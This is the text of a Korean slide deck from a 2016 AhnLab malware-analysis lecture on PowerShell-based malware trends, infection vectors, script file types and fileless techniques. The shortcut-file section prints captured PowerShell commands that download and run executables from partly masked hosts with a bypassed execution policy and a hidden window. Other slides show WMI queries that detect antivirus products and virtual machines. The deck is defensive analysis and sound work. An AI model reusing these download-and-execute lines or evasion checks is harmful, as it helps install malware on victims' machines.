power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

PowerMalware ?!

2016.11.18 – 공개판

안랩시큐리티대응센터(ASEC) 분석팀

차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임연구원

PowerShell 를이용한악성코드와기법

© AhnLab, Inc. All rights reserved. 2

:~$whoami

Profile

− 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7)

− 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작

− 1989년 : Brain virus 변형 감염

− 1997년 : AhnLab 입사

− AhnLab 책임 연구원 (Senior Malware Researcher)

− 시큐리티 대응센터(ASEC) 분석팀에서

악성코드 분석및 연구 중

- 민간합동 조사단, 사이버보안전문단

- vforum, AVED, AMTSO 멤버

- Wildlist Reporter


:~$whoami

• 책

-보안에미쳐라 (2016)

* Source : http://www.yes24.com/24/goods/29333992


시작하기전에

• 보안이완벽한시스템은이세상에없어

- Matthew Broderick 주연위험한게임 (War Games)

* Source : War Games (1983)


Wrap up

• PowerShell 를이용한악성코드증가

- Windows 7와Windows 10 점유율에따름

-보통Ransomware Downloader로이용

-Targeted Attack 에도이용시작포착

• WMI 이용

-Fileless악성코드제작가능

• 전망

- JS,VBS 와함께PowerShell 악성코드증가예상

-Multi-Platform 악성코드가능성

Contents

01

02

03

04

05

06

07

PowerShell

PowerShell를이용한악성코드

Technique

파일종류

Fileless Technique

Case Study

맺음말

01

PowerShell


PowerShell

• PowerShell

- 2006년공개된Script Language

-Windows Vista 이후기본탑재

* Source : https://msdn.microsoft.com/en-us/powershell


Windows Management Instrumentation (WMI)

• WMI

-

* Source : https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx


Windows Management Instrumentation (WMI)

• WMI Architecture

-

* Source : http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/


PowerShell + WMI

• AntiVirus제품정보얻기

- get-wmiobject -Namespace root\SecurityCenter2 -Class AntiVirusProduct


PowerShell + WMI

• 가상환경검사

- Get-WmiObject –Class Win32_ComputerSystem

02

PowerShell을이용한악성코드

© AhnLab, Inc. All rights reserved.

Timeline

Monad

발표

1993 1998 2000 2004 2006 2007 2013 2014 2015

Poweliks

2016

PowerShell

공개

PowerShell

+ Macro

등장

VB

Script

악성코드

PowerShell

Downloader

범람

PowerShell

악성코드POC

Macro

virus

2017

Loveletter PowerShell

Ransomware

Kovter향상된Batch

virus

BedepPhase

WMI

이용한Fileless

침해사고


1995 –Macro virus

• 1995년– 2001년 : Macro virus 전성기

-

* Source :


2000 - Loveletter

• 2000년5월4일LoveLetter virus

- email 로전파

- I love you라는메일제목의사회공학기법사용

-그림, 음악파일파괴


2004 –Monad

• 우려

- 2004년Monad 개발

* Source : https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses


2006 - PowerShell 악성코드POC

• PowerShell POC 악성코드

-

* Source : https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2


2006 - PowerShell Released

• PowerShell Released

-

* Source : http://www.symantec.com/connect/ru/blogs/powershell-released?page=1


2013 –PowerShell Ransomware

• PowerShell Ransomware 등장

-

* Source : https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/


2014 - Poweliks

• Poweliks

-Registry 내저장

* Source : http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/


2014 - Phase

• Phase

-2013년발견된Solarbot변형

* Source : http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/


2015 –WMI 악용

• Black Hat 2015

-

* Source : https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-

Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf


2015 - PowerShell 악성코드증가시작

• PowerShell 악성코드증가

-

* Source : https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/


2016 - Macro + PowerShell

• Macro + PowerShell

-

* Source : http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/


2016 - PowerShell 이용한악성코드유행

• PowerShell 이용한악성코드유행

-

* Source : https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/

03

Technical


In-the-Wild 악성코드조건

조건

많은사용자

보안체계허점

손쉬운제작


PowerShell 악성코드장점

장점

강력한기능

손쉬운제작

행위기반제품우회가능성


주요감염경로

• 주요감염경로

Mail

− 첨부파일혹은 Link

icon

Web Browser

− Exploit Kit 이용

− Fileless악성코드감염에도이용


감염경로

• Mail

-


PowerShell 실행

• 실행권한

- DownloadFile명령의개별명령과스크립트실행테스트

-개별명령은실행되지만스크립트는정책상실행되지않음


PowerShell 실행

• Bypass PowerShell execution policies

-

* Source : https://technet.microsoft.com/en-us/library/ee176847.aspx


PowerShell 실행

• Bypass PowerShell execution policies

-

* Source : http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html


기능

• Downloader 혹은Dropper

-

* Source : https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/

04

파일종류


종류

종류

Office

(DOC, DOCM,

XLS, XLSM)

Shortcut

(LNK)

PowerShell

(PS1)

Windows

Script File

(WSF), HTML

Application

(HTA)

Java Script

/Visual Basic

Script

(JS, JSE,

VBS, VBE,

WSF, HTA)


Java Script - JS

• Java Script (JS)

-


Visual Basic Script

• Visual Basic Script (VBS)

-


Windows Script File (WSF)

• WSF (Windows Script File)

- 대부분Java Script


Windows Script File (WSF)

• WSF (Windows Script File)

-


HTML Application (HTA)

• HTML Application(HTA)

-대부분Java Script


Office (DOC, DOCM, XLS, XLSM)

• Macro 포함문서

-


Shortcut (LNK)

• LNK

-


Shortcut (LNK)

• Download

- %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object

System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath

$b;


Shortcut (LNK)

• Download

- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object

System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'


Shortcut (LNK)

• Encoding

- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand UABvAHc………


PowerShell (PS1)

• PowerShell

-

05

Fileless Technique


Fileless

• FilelessTechnique으로이용

-Poweliks

* Source : https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file


Fileless

• FilelessTechnique으로이용

-Poweliks


Fileless악성코드

• Kovter

- Run 항목읽을수없음



• Kovter

-mshta.exe를통해Script 실행



• Kovter

-인코딩된데이터

06

Case Study

07

맺음말


Error

• Windows PowerShell 작동중지

- 갑자기Windows PowerShell 에러가발생할수있음


Response

• WMI for Detection and Response

-

* Source : https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf


전망

• PowerShell의확장

-

* Source : https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2


전망

전망

JS, VBS

대체?!

Obfuscation Cross-Platform


Wrap up

• PowerShell 를이용한악성코드증가

- Windows 7와Windows 10 점유율에따름

-보통Ransomware Downloader로이용

-Targeted Attack 에도이용시작포착

• WMI 이용

-Fileless악성코드제작가능

• 전망

- JS,VBS 와함께PowerShell 악성코드증가예상

-Multi-Platform 악성코드가능성


현재의보안문제

• Not really a fair fight

* source : http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png


현재의보안문제

• 모두가함께해야하는보안

* source : http://www.security-marathon.be/?p=1786


Q&A

email : [email protected] / [email protected]

http://xcoolcat7.tistory.com

https://twitter.com/xcoolcat7, https://twitter.com/mstoned7


Reference

• Ryan Kazanciyan & Matt Hastings, ‘Investigating PowerShell Attack’, 2014

• Matt Graeber, ‘Abusing Windows Management Instrumentation (WMI) to Build a Persistent,

Asyncronous, and FilelessBackdoor’, 2015

• Santiago M. Pontiroli & F. Roberto Martinez , ‘The Tao of .NET and PowerShell Malware Analysis’, 2015

• 김승훈/AhnLab, ‘매크로다운로더분석’, 2016

power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Technology